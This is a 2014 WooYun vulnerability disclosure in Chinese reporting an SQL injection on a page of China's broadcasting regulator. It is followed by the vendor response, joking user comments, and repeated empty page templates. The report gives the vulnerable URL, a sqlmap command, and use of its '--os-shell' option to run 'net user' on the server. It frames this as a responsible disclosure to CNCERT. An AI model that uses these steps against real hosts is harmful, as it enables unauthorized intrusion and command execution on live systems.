一个SQL注入可致广电总局内网渗透 | wooyun-2014-076523| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076523

漏洞标题：一个SQL注入可致广电总局内网渗透

漏洞作者： niliu

提交时间：2014-09-18 17:46

修复时间：2014-11-02 17:48

公开时间：2014-11-02 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-18：细节已通知厂商并且等待厂商处理中
2014-09-23：厂商已经确认，细节仅向厂商公开
2014-10-03：细节向核心白帽子及相关领域专家公开
2014-10-13：细节向普通白帽子公开
2014-10-23：细节向实习白帽子公开
2014-11-02：细节向公众公开

简要描述：

一个sql注入，可导致广电总局内网渗透。

详细说明：

一个高权限的注入点，直接可导致命令执行，可添加系统管理员，并且3389对外开放，由于其操作的敏感性，未进一步深入测试。
sql注入点：

http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDepartList.aspx?departcode=%27

sqlmap.py -u "http://gdtj.chinasarft.gov.cn/wszb/filemanage/ajaxGetDep
artList.aspx?departcode=" --is-dba --dbs

数据就不看了，直接--os-shell
os-shell> net user

----------------------------------------------------------------
Administrator            ASPNET                   cncert
cncert1                  cncerttest               Guest
---

这几个用户名不知道是cncert的还是其他人添加的...请排查。
看下ip证明是内网

并且开放了3389

漏洞证明：

只证明危害性，未进行深入测试，点到为止。

修复方案：

对相关参数进行过滤，检查服务器是否被入侵。

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-09-23 08:40

厂商回复：

漏洞评价：

2014-09-18 17:54 | 魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子，但是除了他华...)

广电可怕
2014-09-18 17:55 | Coody ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产；如遇接单收徒、绝非本人所...)

您的水表到了。。。。。
2014-09-18 18:05 | 子丑寅卯辰 ( 路人 | Rank:2 漏洞数:1 | 子丑寅卯辰巳午未申酉戌亥)

光腚总菊被爆菊了。。。
2014-09-18 18:16 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

停电了，是不是你搞的。网吧老板准备找人打你
2014-09-18 18:34 | zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1：5 无限量收 [平台担保])

长期出租此id，谢谢合作
2014-09-18 18:35 | 第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子，温润如玉)

爆的好
2014-09-18 19:34 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井，架工，木工，电工，水暖工，力...)

查电表啦。开门，不然停电
2014-09-18 19:36 | xyang ( 普通白帽子 | Rank:242 漏洞数:51 | stay hungry stay foolish)

niniu
2014-09-18 19:37 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖，不如相濡以沫)

光腚总菊
2014-09-19 08:44 | sdj ( 实习白帽子 | Rank:45 漏洞数:6 | 最神奇的一群人，智慧低调又内敛，俗称马甲...)

咚咚咚
2014-09-19 09:59 | 爱Gail ( 普通白帽子 | Rank:237 漏洞数:38 | 爱漏洞、爱编程、爱旅游、爱Gail)

支持爆掉
2014-11-03 13:19 | firetheone ( 路人 | Rank:0 漏洞数:1 | 是个暂时de新人)

@浮萍关电站什么事

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076523

漏洞标题：一个SQL注入可致广电总局内网渗透

相关厂商：广电总局

漏洞作者： niliu

提交时间：2014-09-18 17:46

修复时间：2014-11-02 17:48

公开时间：2014-11-02 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076523

漏洞标题：一个SQL注入可致广电总局内网渗透

相关厂商：广电总局

漏洞作者： niliu

提交时间：2014-09-18 17:46

修复时间：2014-11-02 17:48

公开时间：2014-11-02 17:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-076523"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：